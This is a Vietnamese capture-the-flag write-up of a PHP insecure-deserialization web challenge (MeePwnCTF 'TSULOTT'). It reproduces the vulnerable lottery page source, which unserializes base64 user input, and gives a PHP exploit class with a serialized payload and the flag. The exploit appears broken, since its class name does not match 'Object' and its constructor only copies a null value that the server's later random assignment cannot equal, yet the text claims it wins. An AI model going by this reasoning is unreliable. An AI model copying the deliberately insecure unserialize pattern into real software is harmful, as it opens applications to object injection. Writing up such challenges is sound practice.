πŸ’‰TSULOTT

Easy

Overview

VΓ o Δ‘αΊ§u chΓΊng ta sαΊ½ cΓ³ hai trường inpit nhαΊ­p vΓ o, nhαΊ­p code cα»§a bαΊ‘n để nhαΊ­n win jackpot vΓ  nhαΊ­p 6 sα»‘ để lαΊ₯y code.

Ở Δ‘Γ’y chΓΊng ta sαΊ½ nhαΊ­p Δ‘αΊ‘i gΓ¬ Δ‘Γ³ nhΖ°ng chΓΊng ta sαΊ½ nhαΊ­p ở take code trΖ°α»›c rα»“i lαΊ₯y mα»™t chuα»—i base64 mΓ  trang Δ‘Ζ°a ra rα»“i nΓ³ sαΊ½ trαΊ£ về kαΊΏt quαΊ£ nhΖ° hΓ¬nh ở dΖ°α»›i.

Analys

Sau mα»™t lΓΊc thΓ¬ chΓΊng ta xem source code hiện tαΊ‘i cΓ³ gΓ¬ ctrl+U

Ở Δ‘Γ’y cΓ³ gợi Γ½ cho chΓΊng ta lΓ  GET/?is_debug=1 sau khi nhαΊ­p vΓ o chΓΊng ta sαΊ½ cΓ³ source code cα»§a bΓ i nhΖ° sau:

<body>
<style>
input[type=text] {
    width: 40%;
    padding: 12px 20px;
    margin: 8px 0;
    box-sizing: border-box;
    border: 2px solid red;
    background-color: #ebfff8;
    border-radius: 4px;
}

button[type=submit] {
    width: 10%;
    background-color: #F94848;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

button[type=submit]:hover {
    background-color: #45a049;
}

body {
    background-image: url("money.jpg");
}
</style>

<?php
class Object 
{ 
  var $jackpot;
  var $enter; 
}
?>


<?php

include('secret.php');

if(isset($_GET['input']))  
{
  $obj = unserialize(base64_decode($_GET['input']));
  if($obj)
  {
    $obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99); 
    if($obj->enter === $obj->jackpot)
    {
      echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
      echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
      echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";

    }
    else
    {
      echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
    }
  }
  else
  {
    echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
  }
}
else
{
  echo "";
}
?>
<center>
<br><h2><font color='yellow' size=8>-- TSU</font><font color='red' size=8>LOTT --</font></h2>
<p><p><font color='white'>Input your code to win jackpot!</font><p>
<form>
          <input type="text" name="input" /><p><p>
          <button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<?php
if (isset($_GET['gen_code']) && !empty($_GET['gen_code']))
{
  $temp = new Object;
  $temp->enter=$_GET['gen_code'];
  $code=base64_encode(serialize($temp)); 
  echo '<center><font color=\'white\'>Here is your code, please use it to Lott: <strong>'.$code.'</strong></font></center>';
}
?>
<center>
<font color='white'>-----------------------------------------------------------------------------------------------------------------------------</font>
<h3><font color='white'>Take code</font></h3><p>
<p><font color='white'>Pick your six numbers (Ex: 15 02 94 11 88 76)</font><p>
<form>
      <input type="text" name="gen_code" maxlength="17" /><p><p>
      <button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<!-- debug: GET is_debug=1 -->
<?php
if(isset($_GET['is_debug']) && $_GET['is_debug']==='1')
{
   show_source(__FILE__);
}
?>
</body>

ChΓΊng ta sαΊ½ chΓΊ Γ½ tα»›i hai Δ‘oαΊ‘n code PHP nhΖ° sau:

<?php
class Object 
{ 
  var $jackpot;
  var $enter; 
}
?>


<?php

include('secret.php');

if(isset($_GET['input']))  
{
  $obj = unserialize(base64_decode($_GET['input']));
  if($obj)
  {
    $obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99); 
    if($obj->enter === $obj->jackpot)
    {
      echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
      echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
      echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";

    }
    else
    {
      echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
    }
  }
  else
  {
    echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
  }
}
else
{
  echo "";
}
?>

ĐoαΊ‘n code php thα»© nhαΊ₯t cΓ³ mα»™t class Object cΓ³ hai thuα»™c tΓ­nh lΓ  jackpot vΓ  enter.

TiαΊΏp theo chΓΊ Γ½ tα»›i dΓ²ng 16 nΓ³ sαΊ½ unserialize Δ‘oαΊ‘n code khi nhαΊ­p input vΓ o, vΓ  nΓ³ được gΓ‘n biαΊΏn $obj. TiαΊΏp theo nΓ³ kiểm tra cΓ³ $obj khΓ΄ng thΓ¬ nΓ³ sαΊ½ random jackpot thΓ nh 6 sα»‘ vΓ  random tα»« 10-99 cΓ‘ch nhau ra.

Cuα»‘i cΓΉng thuα»™c tΓ­nh enter mΓ  bαΊ±ng jackpot thΓ¬ cΓ³ thể cΓ³ flag

Ở dΖ°α»›i cΓ³ thΓͺm Δ‘oαΊ‘n code serialize nα»™i dung code chΓΊng ta nhαΊ­p ở dΖ°α»›i.

TΓ³m lαΊ‘i khi nΓ y chΓΊng ta nhαΊ­n ra Δ‘Γ’y lΓ  PHP Deserialization khi Δ‘Γ³ chΓΊng ta cΓ³ thể control cαΊ£ class Object trΓͺn bαΊ±ng cΓ‘ch ghi Δ‘Γ¨ nΓ³ để hai thuα»™c tΓ­ch jackpot vΓ  enter bαΊ±ng nhau.

Exploit

Ý tưởng bΓ’y giờ chΓΊng ta sαΊ½ xΓ’y dα»±ng lαΊ‘i class Object giα»‘ng nhΖ° trΓͺn vΓ  khởi tαΊ‘o hΓ m __constructor cho hai thuα»™c tΓ­nh bαΊ±ng nhau.

<?php
class Exploit
{
    var $jackpot;
    var $enter;

    public function __construct()
    {
        $this->jackpot=$this->enter;
    }

}
$code = new Exploit();
echo base64_encode(serialize($code));
//Tzo3OiJFeHBsb2l0IjoyOntzOjc6ImphY2twb3QiO047czo1OiJlbnRlciI7Tjt9

Flag: MeePwnCTF{__OMG!!!__Y0u_Are_Milli0naire_N0ww!!___}

Last updated